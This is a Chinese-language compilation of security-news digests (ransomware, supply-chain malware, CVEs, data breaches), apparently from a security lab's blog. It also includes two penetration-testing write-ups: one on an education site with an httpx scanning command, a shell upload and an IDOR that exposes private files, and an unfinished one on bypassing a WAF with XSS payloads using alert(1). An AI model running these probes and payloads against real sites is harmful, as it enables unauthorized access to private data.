1、研究人员发现针对Telegram和云用户的供应链攻击活动 https://checkmarx.com/blog/users-of-telegram-aws-and-alibaba-cloud-targeted-in-latest-supply-chain-attack/ 2023年9月，一个使用“kohlersbtuh15”假名的攻击者，通过向PyPi包管理器上传一系列恶意包，试图利用开源社区进行传播。根据这些包的名称和代码，可以看出这个攻击者的目标是使用阿里云服务、AWS和Telegram的开发者。这次攻击的特点是，攻击者利用了Typosquatting(误拼)和Starjacking(星标劫持)等技术，诱导开发者下载恶意包。Typosquatt 2、Fantom Foundation因Chrome漏洞遭黑客攻击 https://www.hackread.com/fantom-foundation-wallet-hack-google-chrome-0-day-flaw/ 2023年10月17日，Fantom Foundation(开发Fantom区块链的组织)遭到了一场网络钓鱼攻击。黑客利用了Google Chrome浏览器的一个零日漏洞，直接影响了该组织的运营。这次攻击导致了估计为65.7万美元的资金被非法转移，这是本月困扰区块链领域的众多安全事件之一。据研究人员称，攻击者从Fantom Foundation在以太坊和Fantom网络上的钱包中窃取了资金。攻击者将偷来的资金集中到一个地址中，该地址 3、CasaOS存在严重的安全漏洞，需尽快修复 https://www.sonarsource.com/blog/security-vulnerabilities-in-casaos/ CasaOS是一个开源的家庭云系统，可以让用户在自己的设备上部署和管理各种应用。然而，近日研究人员发现了CasaOS中存在多个严重的安全漏洞，包括任意文件读取、任意文件上传、命令注入、跨站脚本攻击等。这些漏洞可以让攻击者获取用户的敏感数据，甚至控制用户的设备。研究人员已经向CasaOS的开发者报告了这些漏洞，并提供了一些修复建议。目前，CasaOS的最新版本是0.3.7，还没有发布修复这些漏洞的更新。因此，建议CasaOS的用户尽快升级到最新版本，并避免在 4、D-Link确认数据泄露，员工和合作伙伴受影响 https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10359 D-Link是一家知名的网络设备制造商，近日确认了一起数据泄露事件，导致员工和合作伙伴的个人信息和敏感数据被暴露。据报道，这起数据泄露事件发生在2023年9月30日，当时D-Link的一个第三方服务提供商遭到了网络攻击。攻击者利用了一个未修复的漏洞，窃取了D-Link的员工和合作伙伴的姓名、电子邮件地址、电话号码、职位、公司名称等信息。D-Link表示，已经通知了受影响的员工和合作伙伴，并提供了一些安全建议，如修改密码、监控 5、《2023年全球云威胁报告》：90%的安全供应链实则并不安全 https://www.freebuf.com/articles/paper/380279.html 近日，云安全公司Sysdig发布了《2023年全球云威胁报告》，研究了瞄准垂直行业的针对性云攻击，结果发现云攻击者正在通过利用云服务和常见的错误配置，以复杂的方式发展他们的技术和工具包。更重要的是，云中的攻击移动速度很快，侦察到威胁和造成严重破坏之间的间隔可能仅几分钟。 6、WIKI系统 Confluence存在高危漏洞 https://www.freebuf.com/news/381032.html 近日，CISA、FBI 和 MS-ISAC 警告网络管理员立即为其 Atlassian Confluence 服务器更新安全补丁，以防止网络攻击者中主动利用严重性漏洞 CVE-2023-22515。 7、香港芭蕾舞团电脑遭勒索软件入侵读取个人及内部资料 https://www.secrss.com/articles/59712 香港芭蕾舞团公布，电脑网络系统近日遭勒索软体入侵，导致内部电脑系统遭非法读取，当中或包括个人资料及港芭内部资料。 8、黑客利用币安智能链储存恶意代码 https://thehackernews.com/2023/10/binances-smart-chain-exploited-in-new.html 过去两个月，黑客劫持了 WordPress 网站向访问者展示浏览器需要更新才能正常访问的信息，如果访客上当他们会下载恶意程序收集登陆凭证等敏感信息，恶意程序通常托管在 Web 服务上，一经发现会迅速被移除。但在这起攻击中，黑客利用了币安智能链的智能合约去储存永远无法移除的恶意代码。加密货币所使用的区块链在信息写入之后是很难移除的。 9、专家警告Milesight 路由器和 Titan SFTP 服务器严重漏洞已被利用 https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html VulnCheck 的新发现显示，影响Milesight工业蜂窝路由器的严重缺陷可能已在现实世界的攻击中被积极利用。该漏洞被追踪为 CVE-2023-43261（CVSS 评分：7.5），被描述为影响 35.3.0.7 版本之前的 UR5X、UR32L、UR32、UR35 和 UR41 路由器的信息泄露案例，可能使攻击者能够访问https://nvd.nist.gov/vuln/detail/CVE-2023-43261例如 httpd. 10、Zabbix 修复缓冲区溢出漏洞（CVE-2023-32722） http://www.anquan419.com/knews/24/6016.html Zabbix 修复了一个缓冲区溢出漏洞（CVE-2023-32722），由于 Zabbix 受影响版本中 zabbix src libs zbxjson 模块未对 JSON 数据的深度进行校验，导致 zbx_json_open 方法解析 JSON 深度超过 64 层时存在缓冲区溢出漏洞。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、研究人员发现针对拉丁美洲用户的新型恶意软件TOITOIN https://www.zscaler.com/blogs/security-research/toitoin-trojan-analyzing-new-multi-stage-attack-targeting-latam-region 研究人员最近发现一个针对拉丁美洲用户的攻击活动。在此次攻击活动中，攻击者利用多阶段的攻击链执行定制的模块，例如将恶意代码注入到进程中、通过COM组件绕过用户账户控制、 规避沙箱检测等，最终投递一个名为“TOITOIN”的新型恶意软件。该恶意软件采用独特的XOR解密技术对配置文件进行解密，收集系统信息，并对已安装浏览器及Topaz OFD产品中的相关数据进行窃 2、攻击者使用Legion窃密木马针对PUBG玩家进行攻击 https://blog.cyble.com/2023/07/11/legion-stealer-targeting-pubg-players 研究人员最近发现了一个Github页面，该页面伪装成PUBG作弊工具的项目，并借此传播恶意软件。攻击者对其中的“Karogour_Bypanls.Scr”文件的后7个字符进行反转，将其文件名变成“Karogour_BypasrcS.sln”以此诱导用户执行。该程序是一个基于GUI的32位可执行程序，使用.NET语言进行编写，运行后将“Local_ycsNYnaBZ.sln”文件及“LocalchfRgyVJSk.exe”程序放置%appdata%目录 3、微软针对132个漏洞发布安全更新，包括多个已被利用零日漏洞 https://thehackernews.com/2023/07/microsoft-releases-patches-for-130.html 微软发布安全更新，以解决132个安全漏洞，其中包括6个零日漏洞，且这些零日漏洞已被利用。CVE-2023-32046，CVSS评分为7.8，是Windows MSHTML平台提权漏洞；CVE-2023-32049，CVSS评分为8.8，是Windows SmartScreen安全功能绕过漏洞；CVE-2023-35311，CVSS评分为8.8，是Microsoft Outlook安全功能绕过漏洞；CVE-2023-36874，CVSS评分为7.8 4、HCA Healthcare泄露1100万患者数据 https://securityaffairs.com/148371/data-breach/hca-healthcare-data-breach.html HCA Healthcare披露了一个数据泄露事件，该机构表示大约1100万患者的个人信息在此次事件中泄露。7月5日，黑客在黑客论坛中宣传入侵了该机构，并发布了一些患者的相关数据信息。HCA Healthcare仍在对此次事件进行调查，尚未在其网络或系统中发现与此次事件相关的证据。HCA Healthcare指出数据泄露列表中包含约2700万行数据，其中可能包括约1100万患者的个人信息。该机构表示不认为此次数据泄漏涉及到患者的临床信息 5、特立尼达和多巴哥遭受网络攻击 https://therecord.media/trinidad-tobago-hit-with-cyberattack 特立尼达和多巴哥司法部正在处理一起影响该国司法部运作的网络攻击事件，其数字转型部最近几天发现了针对该国总检察长办公室和法律事务部（AGLA）的网络攻击。虽然暂未给出攻击开始的具体日期，但AGLA发布消息表示，自6月30日以来一直在处理网络攻击所导致的问题，其内部服务中断，并且在此之后不能够收到以电子方式传来的法庭文件。为解决此问题，该部门提供了发送法庭文件的备用电子邮箱地址，并表示可以在西班牙首都港口提供面对面的法庭服务。 6、疑似迪卡侬 8000 名员工个人信息暴露暗网上 https://www.freebuf.com/news/380889.html The cyber express 网站消息，某论坛用户爆料知名体育用品零售商迪卡侬一起数据泄露事件，大约 8000 名员工个人信息在此前迪卡侬数据泄露事件中被曝光，这些信息目前已在暗网上“共享”。 7、思科未修补的零日漏洞CVE-2023-20198(CVSS:10)正被积极利用 https://www.freebuf.com/news/380882.html 思科要求客户立即在其所有面向互联网的 IOS XE 设备上禁用 HTTPS 服务器功能，以防止攻击者利用操作系统 Web 用户界面中的一个关键零日漏洞。思科 IOS XE 是思科用于下一代企业网络设备的操作系统。该漏洞被命名为 CVE-2023-20198，影响所有启用了 Web UI 功能的 Cisco IOS XE 设备。思科将该漏洞定义为一个权限升级漏洞，可以完全接管设备。思科将该漏洞在 CVSS 评级中定为 10 分（满分 10 分）。 8、微软计划在 Win11 中弃用 NTLM 身份验证协议 https://www.freebuf.com/news/380859.html 微软公司宣布，计划在未来的 Windows 11 中取消 NT LAN Manager，将其换成其他认证方式并加强安全性。微软方面强调，此次变化的重点是加强自 2000 年以来一直默认使用的 Kerberos 身份验证协议，从而减少对 NT LAN Manager 的依赖。Windows 11 的新功能包括使用 Kerberos 的初始和通过身份验证以及用于 Kerberos 的本地密钥分发中心。 9、因收到100万美元“侮辱性”赎金，Lockbit泄露CDW内部数据 https://www.freebuf.com/news/380865.html 近日，知名勒索软件团伙Lockbit声称入侵了技术服务巨头 CDW，并因赎金谈判破裂泄露了部分数据。CDW是全球最大的经销商企业之一，专为商业、政府和教育提供技术解决方案和服务。Lockbit在入侵CDW后索要8000万美元赎金，但该组织声称该对方只支付了 100 万美元。 10、MemComputing ASIC 可能会破坏 2048 位 RSA 加密 https://www.securityweek.com/beyond-quantum-memcomputing-asics-could-shatter-2048-bit-rsa-encryption/ 总部位于圣地亚哥的 MemComputing 正在研究使用内存处理 ASIC（专用集成电路）来实时破解 2048 位 RSA。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、恶意NuGet包冒充加密货币项目感染开发者 https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/ 近日，安全研究人员发现了一些恶意的NuGet包，它们冒充了一些流行的加密货币项目和平台，例如Solana、Kucoin和Discord，目的是感染开发者的电脑，安装SeroXen远程控制木马。这些恶意包由一个名为“Disti”的用户上传，共有12个，下载量超过200万次。这些包含有一个混淆的批处理文件，当开发者使用NuGet包管理器安装这些包时，就会执行该文件，从远程服务器下载并运行SeroXen木马。SeroXen木马可以窃取 2、俄罗斯黑客利用WinRAR漏洞攻击乌克兰冲突区 https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack 研究人员发现，与俄罗斯有关联的国家级威胁行为者发起了一系列基于网络钓鱼的攻击，目标是乌克兰冲突区域的机构和个人。这些攻击利用了最近发现的影响WinRAR压缩软件6.23之前版本的漏洞，编号为CVE-2023-38831。攻击者通过发送一个恶意的压缩文件来诱骗受害者打开，该压缩文件包含一个伪装成分享指标(IoCs)的PDF文件，以及一个与PDF文件同名(包括末尾空格)的目录，该目录中有一个BAT脚本。由于漏洞的存在，当受害者尝试打开PDF文件 3、AgentTesla通过CHM和PDF文件在最近的攻击中传播 https://cyble.com/blog/agenttesla-spreads-through-chm-and-pdf-files-in-recent-attacks/ AgentTesla是一个基于.NET框架的信息窃取器，旨在渗透计算机并秘密地从受害者的机器中提取敏感信息。近日，研究人员在VirusTotal(VT)中发现了一个恶意的Gzip压缩文件。这个Gzip文件包含了一个CHM文件，它触发了AgentTesla感染的开始。在最近的活动中，研究人员发现了一个被Gzip压缩并很可能通过恶意垃圾邮件发送的CHM文件。这个精心制作的CHM文件充当了一个诱饵。根据CHM文件中可用的内容， 4、威胁行为者利用币安智能链合约传播恶意代码 https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16 近日，研究人员发现一些恶意行为者利用币安智能链(BSC)合约来托管和传播恶意代码。研究人员将其活动代号为EtherHiding，它利用被感染的WordPress网站来诱骗访问者更新他们的浏览器，然后下载信息窃取型恶意软件，如Amadey、Lumma或RedLine。攻击者在被感染的网站上注入了一个混淆的Javascript，用来通过创建一个智能合约来查询BNB智能链，合约中包含了攻击者控制的区块链地 5、AI算法用于检测和防御针对无人军用机器人的中间人攻击 https://www.unisa.edu.au/media-centre/Releases/2023/new-cyber-algorithm-shuts-down-malicious-robotic-attack/ 研究人员开发了一种使用机器学习技术的算法，可以检测和拦截对无人军用机器人的中间人(MitM)攻击。MitM攻击是一种网络攻击，其中攻击者截取了机器人和其合法控制器之间的数据流，以窃听或在流中注入虚假数据。这种攻击可能会干扰无人驾驶车辆的运行，修改传输的指令，甚至夺取控制权，指示机器人采取危险行动。该算法在美国陆军使用的GVR-BOT复制品中进行了测试，记录了99%的攻击预防成功 6、ALPHV勒索软件攻击美国莫里森社区医院窃取了5TB数据 https://securityaffairs.com/152486/cyber-crime/alphv-ransomware-morrison-community-hospital.html 美国伊利诺伊州的莫里森社区医院(MCH)遭到了ALPHV/BlackCat勒索软件团伙的攻击，导致其部分系统被加密，并且有大量的敏感数据被窃取。该团伙在其暗网网站上公布了部分数据的截图，包括患者的姓名、出生日期、社会保险号、诊断信息、医疗保险信息等。该团伙还声称他们已经从医院的服务器上下载了超过5TB的数据，并威胁如果不支付赎金，就会公开更多的数据。ALPHV/BlackCat勒索软件是一种新兴的网络 7、Storm-0324 与勒索团伙 Sangria Tempest 勾结 https://www.freebuf.com/articles/network/379912.html 2023 年 7 月上旬，微软称之为 Storm-0324 的攻击组织通过 Microsoft Teams 发送钓鱼邮件进行攻击。Storm-0324 是一个以经济获利为动机的攻击组织，以通过钓鱼邮件执行远程代码获取失陷主机访问权限而闻名。获取立足点后 Storm-0324 通常会将访问权限转卖给其他犯罪团伙，如勒索软件组织 Sangria Tempest（又叫 FIN7、Carbon Spider）与 TA543 等。攻击组织 Sangria Tempest 与 Storm-0324 8、 阿里云、华为、金山办公等发起，人工智能安全治理专业委员会成立 https://www.ithome.com/0/724/987.htm “中国网络空间安全协会”官方公众号10月14日下午宣布，10 月 12 日上午，中国网络空间安全协会人工智能安全治理专业委员会正式成立。 9、密码泄露及时通知，谷歌为自家搜索 App 添加一系列隐私功能 https://www.ithome.com/0/724/835.htm 谷歌目前表示，任何拥有谷歌账号的用户，近日都可以在“谷歌手机软件”中启用“暗网报告”功能，谷歌在今年 5 月公布这项功能，可在用户密码泄露时告知用户。 10、思科再次承认使用了硬编码密码 https://www.schneier.com/blog/archives/2023/10/cisco-cant-stop-using-hard-coded-passwords.html 思科最近披露了 Cisco Emergency Responder 的一个漏洞 CVE-2023-20101，它包含了一个 root 账号的静态用户凭证，原本是为开发保留的，但不小心留在了最终用户产品中。攻击者可以使用该账号登陆受影响系统，以 root 用户权限执行任意命令。这远非第一次思科在其产品中使用了硬编码密码。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

0x1.前言 本文章仅用于信息安全防御技术分享，因用于其他用途而产生不良后果，作者不承担任何法律责任，请严格遵循中华人民共和国相关法律法规，禁止做一切违法犯罪行为。文中涉及漏洞均以提交至教育漏洞平台，现已修复。 0x2.背景 本人从9月10号开始挖掘教育网的漏洞，截至到10月10号已经上了一百多分，其中还挖掘到了多个证书站的漏洞。 然后经过有师傅提醒，说某某985证书快要上线了，我看了一下漏洞提交的还不算太多，这不赶紧抓住机会上分一波？从清楚目标到挖出漏洞不到一天（主打一个快速挖掘），于是就有了这篇文章。 0x3.信息搜集 渗透测试的第一要义是信息搜集，你能搜集到别人搜集不到的信息，你就能挖到别人挖不到的漏洞 这里推荐我使用的一个集成工具：oneforall，工具地址：https://github.com/shmilylty/OneForAll 然后收集到大量资产后，我会先初步使用httpx对一些路径进行快速批量探测： httpx工具地址：https://github.com/projectdiscovery/httpx httpx.exe -path /api/users -l target.txt -title -tech-detect -status-code -threads 50 -web-server -mc 200 这里将你搜集的资产的链接放在target.txt中 -path /api/users: 这是目标URL的路径，其中/api/users表示要测试的API端点的路径。 -title: 此选项指示工具在输出中包括目标网页的标题。 -tech-detect: 这个选项告诉工具进行技术检测，它将尝试识别目标URL上运行的Web服务器和后端技术。 -status-code: 此选项要求工具返回每个请求的HTTP响应状态代码。 -threads 50: 这个选项指定了并行执行的线程数，工具将使用50个线程同时测试目标URL。 -web-server: 此选项告诉工具输出目标URL上运行的Web服务器的信息。它可以显示服务器类型和版本等信息。 -mc 200: 这是一个过滤选项，它指定了匹配响应状态码的条件。在这里，-mc 200 表示只输出具有HTTP响应状态码为200的结果。 然后经过初步信息搜集后我锁定了某个可疑站点因为可疑直接注册，于是开始着手渗透。 0x4.渗透利用 漏洞点1--未授权访问 测了一下注册点逻辑，利用不了遂放弃进入后台。 然后我进入了个人后台，我发现了有数据申请的功能于是着手开测： 遇到上传点，我们测一测！ 嗯？没有过滤吗？直接传上shell了？但是Burp抓包查看返回也没有留下上传路径遂作罢。 然后我点击了下载模板按钮抓包如下： https://xxx.edu.cn/xxx/xxx/download/161 我的直觉告诉我这个链接非常可疑！ 我这里直接改成其他数字，啪！直接把别人上传的隐私文件下载下来了！ 通过burp快速探测我发现数字为 157 ---293都可以下载文件，也就是说泄露了快150个敏感文件。如果不修复这个漏洞的话，后面不管谁上传的文件都可能被任意下载。 还有多个学生证照片/教工证照片/内部信息文件等敏感信息。好嘞初步rank到手！ 这里就可以解释一下我上传shell了但是却连接不上： 访问对应的链接发现： Content-Disposition 是 HTTP 头字段之一，它通常用于指定如何处理由服务器返回的响应内容。 这里这个头的意思是告诉客户端浏览器，响应的内容应被视为附件（文件下载），而不是在浏览器中直接显示。我尝试绕过也没有成功，也就是说文件直接没有解析了所以getshell方面我就作罢了。 为了确保能上中危，我决定再继续测一点功能。 漏洞点2--水平越权 注册两个账户 截取POST包： 回显成功： 通过这样可以让任意申请进行提前提交。 0x5.总结 总的来说信息搜集非常重要，同时细心也非常重要。不要因为某个点没测成功就放弃了，可以多去尝试尝试其他的地方。而且想要快速出成果的话最好去找那种可以任意注册的站~

1、研究人员发布一款追踪和分析勒索软件攻击的工具 https://cybernews.com/ransomlooker/ 勒索软件是一种恶意软件，通过加密受害者的文件或系统，然后要求支付赎金来解密的一种网络攻击手法。近年来，勒索软件攻击的规模和频率都在不断增加，给全球的个人和组织带来了巨大的损失和威胁。为了应对这一挑战，研究人员推出了一款名为Ransomlooker的工具，可以监控勒索软件团伙的勒索网站，并提供他们在全球范围内的攻击声明的汇总信息。该工具的目的是帮助网络安全专家在日常工作中获取实时更新和可行的洞察，以便更好地防御和应对勒索软件攻击。Ransomlooker的主要功能包括：收集并展示来自不同勒索软件团伙的最新攻击声明，包括受害 2、BianLian勒索团伙窃取Air Canada数据并威胁公开 https://www.bleepingcomputer.com/news/security/bianlian-extortion-group-claims-recent-air-canada-breach/ BianLian勒索团伙近日宣称，他们在9月份成功入侵了加拿大最大的航空公司Air Canada的网络，窃取了210GB的数据，并威胁如果不支付赎金，就会公开这些数据。这些数据包括员工的个人信息、机票预订、机场运营、飞行计划等敏感信息。BianLian勒索团伙在其暗网网站上发布了一些数据的截图，作为证据。 Air Canada在9月份时曾经承认遭到了网络攻击，但只是表示受影响的系统包括 3、Shadow PC遭黑客利用恶意游戏入侵，用户信息被盗卖 https://www.bleepingcomputer.com/news/security/shadow-pc-warns-of-data-breach-as-hacker-tries-to-sell-gamers-info/ Shadow PC是一家提供高端云计算服务的公司，它允许用户在任何设备上享受高性能的游戏体验。然而，该公司近日遭受了一场数据泄露事件，导致用户的私人信息被黑客窃取，并在网上出售。据Shadow PC的首席执行官在周三发出的一封电子邮件中透露，这场数据泄露事件发生在上个月，是由一次“社交工程攻击”引起的。一名公司员工在Discord平台上下载了一个伪装成Steam平台 4、ToddyCat APT组织开发了一套新的数据窃取工具 https://securelist.com/toddycat-keep-calm-and-check-logs/110696/ ToddyCat APT组织是一支活跃于欧洲和亚洲的高级持续性威胁(APT)行为者，自2020年以来就一直被研究人员关注。该组织主要使用Ninja木马和Samurai后门作为其攻击武器，但最近，研究人员发现了该组织开发和维护的一套新的恶意软件工具，用于实现持久性、进行文件操作和加载额外的有效负载。这些工具包括一系列加载器，可以启动Ninja木马作为第二阶段；一个名为LoFiSe的工具，可以查找和收集感兴趣的文件；一个DropBox上传器，可以将窃取的数据保存到Dr 5、DarkGate恶意软件通过即时通讯平台传播 https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html DarkGate恶意软件是一种多功能的恶意软件工具包，可以从浏览器中窃取敏感数据，进行加密货币挖矿，并允许其操作者远程控制受感染的主机。它还可以作为一个下载器，下载额外的有效负载，如Remcos RAT。DarkGate恶意软件最初于2018年被发现，并主要针对欧洲和西班牙用户。2023年6月，DarkGate恶意软件的开发者在地下论坛上宣传了其新版本，称其具有更强的逃避检测和限 6、AvosLocker勒索软件利用正规驱动文件绕过杀毒扫描 https://www.cisa.gov/sites/default/files/2023-10/aa23-284a-joint-csa-stopransomware-avoslocker-ransomware-update.pdf AvosLocker勒索软件是一种相对较新的勒索软件家族，它使用了最新的勒索软件特征，即通过威胁暴露窃取的信息来进行“双重勒索”。该勒索软件于2022年7月首次被发现，它声称自己是一个“专业的加密服务”，并提供了一个暗网门户网站，用于与受害者沟通和支付赎金。该门户网站还显示了一些被攻击的组织的名称和部分数据，作为对其他潜在受害者的威胁。AvosLocker勒索软 7、未修复的WS_FTP服务器遭受勒索软件攻击 https://www.bleepingcomputer.com/news/security/ransomware-attacks-now-target-unpatched-ws-ftp-servers/ WS_FTP是一款广泛使用的FTP软件，主要用于在网络上传输文件。然而，该软件存在一个最高级别的漏洞，编号为CVE-2023-28252，可以让攻击者在本地访问的情况下执行任意代码。该漏洞已经被一些勒索软件利用，例如LockBit 3.0。据研究人员观察，自称为Reichsadler Cybercrime Group的威胁行为者试图利用这个漏洞，在未修复的WS_FTP服务器上部署勒索软件载 8、微软将淘汰NTLM，转向更强的Kerberos认证 https://techcommunity.microsoft.com/t5/windows-it-pro-blog/the-evolution-of-windows-authentication/ba-p/3926848 微软宣布，计划在未来的Windows 11中淘汰NT LAN Manager(NTLM)，转向更强的Kerberos认证。NTLM是一种早期的单点登录(SSO)工具，使用挑战-应答协议来验证用户的密码。但是，NTLM存在一些安全弱点，容易受到中继攻击，导致未授权访问网络资源。微软表示，将加强Kerberos认证协议，这是自2000年以来的默认协议，并减少对NTLM的依赖。 9、LOCKBIT勒索软件团伙向CDW索要8000万赎金 https://securityaffairs.com/152470/cyber-crime/lockbit-ransomware-gang-hacked-cdw.html CDW公司是一家提供技术产品和服务的跨国公司，拥有超过1000万的客户和超过100亿美元的年收入。近日，该公司遭到了LockBit勒索软件团伙的攻击，黑客声称已经窃取了该公司的敏感数据，并在暗网上发布了一个倒计时，要求CDW公司在16天内支付赎金，否则就会公开数据。目前，CDW公司的官网仍然正常运行，没有显示任何被攻击的迹象。CDW公司也没有对此事发表任何声明或回应。LockBit勒索软件团伙索要8000万美元的赎金，但 10、奖金最高15000美元！微软宣布Bing AI漏洞赏金计划 https://www.freebuf.com/news/380600.html 近日，微软宣布了一项新的人工智能赏金计划，重点关注Bing AI的体验，奖金达到了15000美元。 随着人工智能驱动的Bing体验成为新漏洞赏金计划的第一个产品，安全研究人员可以提交在以下合格服务和产品列表中发现的漏洞： 在浏览器中，Bing .com上的人工智能必应体验(支持所有主要供应商，包括Bing Chat, Bing Chat for Enterprise和Bing Image Creator) 在Microsoft Edge (Windows)中集成了人工智能支持的必应，包括企业版必应聊天 在微软启动应用程序(iOS和Android)中集成人工智能支持的Bing 在Skype移动应用程序(iOS和Android)中集成ai支持的Bing 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、LinkedIn智能链接攻击再次针对微软账户 https://www.bleepingcomputer.com/news/security/linkedin-smart-links-attacks-return-to-target-microsoft-accounts/ 近日，研究人员发现了一种新的网络钓鱼攻击，利用LinkedIn的智能链接功能来窃取微软账户的凭证。智能链接是LinkedIn提供的一种服务，可以让用户分享文档和演示文稿，而无需离开LinkedIn平台。攻击者通过发送带有智能链接的LinkedIn消息来诱骗受害者，当受害者点击链接时，会被重定向到一个伪造的微软登录页面，要求输入账户和密码。如果受害者输入了凭证，攻击者就可 2、辛普森制造公司在网络攻击后关闭IT系统 https://www.bleepingcomputer.com/news/security/simpson-manufacturing-shuts-down-it-systems-after-cyberattack/ 近日，辛普森制造公司通过SEC 8-K文件披露了一起网络安全事件，该事件已导致其运营中断，预计这种情况将持续下去。辛普森制造公司是一家美国建筑和结构材料生产商，也是北美结构连接件和锚栓的主要制造商之一，拥有5150名员工，年净销售额为21.2亿美元(2022 年)。该公司表示，上周二检测到IT问题和应用程序中断，但很快意识到这是由网络攻击引起的。针对这种情况，辛普森关闭了所有 3、Microsoft Defender新增自动隔离功能，阻止攻击者横向移动 https://www.microsoft.com/en-us/security/blog/2023/10/11/microsoft-defender-for-endpoint-now-stops-human-operated-attacks-on-its-own/ 近日，微软宣布推出一个新的功能，名为“contain user”，可以自动隔离被攻击者控制的用户账户，阻止攻击者在网络中横向移动。这个功能是基于微软的自动攻击干扰技术，可以在检测到手动键盘攻击(hands-on-keyboard attack)时，立即采取行动，限制攻击者的权限和范围。手动键盘攻击是指攻击者利用被盗或被泄露的用户 4、CISA将Acrobat Reader漏洞添加到已知被利用漏洞目录 https://www.cisa.gov/known-exploited-vulnerabilities-catalog 美国网络安全和基础设施安全局(CISA)在其已知利用漏洞目录中添加了5个新漏洞，其中包括Adob​​e Acrobat Reader中的一个高严重性漏洞(CVE-2023-21608)(CVSS 评分：7.8)。该漏洞属于释放后使用问题，攻击者可以触发该漏洞，以当前用户的权限实现远程代码执行(RCE)。“Adobe Acrobat Reader版本22.003.20282(及更早版本)、22.003.20281(及更早版本)和20.005.30418(及更早版本)受到该漏 5、Apple 发布 iOS 16 更新以修复旧设备上的 CVE-2023-42824 https://securityaffairs.com/152401/security/apple-releases-ios-16-update.html Apple 发布了 iOS 16.7.1 和 iPadOS 16.7.1 版本，以解决已被积极利用的攻击中的 CVE-2023-42824 漏洞。Apple 发布了iOS 16.7.1 和 iPadOS 16.7.1，以解决最近披露的零日漏洞CVE-2023-42824。该漏洞是存在于内核中的权限提升问题，已通过改进的检查得到解决。 6、一帆工业路由器存在多个严重漏洞可能使组织面临攻击 https://www.securityweek.com/unpatched-vulnerabilities-expose-yifan-industrial-routers-to-attacks/ 思科 Talos 威胁情报和研究小组周三报告称，中国公司一帆制造的工业路由器受到多个严重漏洞的影响，这些漏洞可能使组织面临攻击。供应商于 6 月底收到通知，并给了 90 多天的时间来发布补丁。然而，似乎尚未发布任何修复程序，并且思科已根据其漏洞披露政策公开了技术细节。Talos 研究人员在 Yifan 的 YF325 蜂窝路由器中发现了十多个漏洞。据该供应商介绍，该设备已部署在自助终端、智能交通、 7、ShellBot 使用十六进制 IP 来逃避攻击检测 https://thehackernews.com/2023/10/shellbot-uses-hex-ips-to-evade.html ShellBot背后的威胁行为者正在利用转换为十六进制表示法的 IP 地址来渗透管理不善的 Linux SSH 服务器并部署 DDoS 恶意软件。 8、研究人员发现冒充 WordPress 缓存插件的恶意软件 https://thehackernews.com/2023/10/researchers-uncover-malware-posing-as.html 网络安全研究人员发现了一种新型复杂恶意软件，该恶意软件伪装 WordPress 插件，秘密创建管理员帐户并远程控制受感染的网站。 9、研究人员在误植的 NuGet 包中发现了 SeroXen RAT https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package 该软件包包含一个恶意安装脚本，该脚本在安装过程中秘密执行，下载一个模糊的批处理脚本，最终构建并执行 PowerShell 脚本。 10、Google 采用密钥作为所有用户的默认登录方式 https://thehackernews.com/2023/10/google-adopts-passkeys-as-default-sign.html 谷歌周二宣布，所有用户都可以默认设置密钥，五个月后，它在所有平台上推出了对FIDO Alliance支持的Google帐户无密码标准的支持。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言 最近一直在看国外的赏金平台，绕waf是真的难受, 记录一下绕过的场景。 初步测试 一开始尝试XSS，发现用户的输入在title中展示，那么一般来说就是看能否闭合，我们从下面图中可以看到，输入尖括号后被转成了实体。 绕过html实体编码 解释一下什么是html实体编码 HTML实体编码，也即HTML中的转义字符。 在 HTML 中，某些字符是预留的，例如在 HTML 中不能使用小于号<和大于号>，这是因为浏览器会误认为它们是标签。 如果希望正确地显示预留字符，我们必须在HTML源代码中使用字符实体（character entities）。 HTML 中的常用字符实体是不间断空格。（注意：实体名称对大小写敏感！） 字符实体类似这样：&entity_name; 或者 &#entity_number;如需显示小于号，我们必须这样写：< 或 < 常见的实体编码： 关于更多的实体可在下面网站查看寻找： https://symbl.cc/cn/unicode/blocks/basic-latin/#subblock-0061继续尝试是发现我们讲html10进制实体编号输入转义会闭合title标签 原本以为事情逐渐简单了起来，结果更大的一个坑在等着我。 WAF层面 原本想着<img/src=1 onerror=alert(1) />直接秒杀 结果来了个waf 。 下一步按照往常一样 fuzz事件，结果全是403，这时候那没办法了那就不能用img标签了 改换其他标签，fuzz以下 发现可用的还不少。 然后使用a标签进行绕过 常用的payload，基于下面payload改就行了 <a href="javascript:alert(1)"/> 原本是一番风顺的 到后面发先还有过滤，真吐了,看图就好 绕过javascript,到这里了可能一部分人觉得已经结束了，但实际上没那么简单 前面其实花的时间并不多主要绕alert的时候。此处我尝试的多种方式包括html实体绕过，基本都不行， 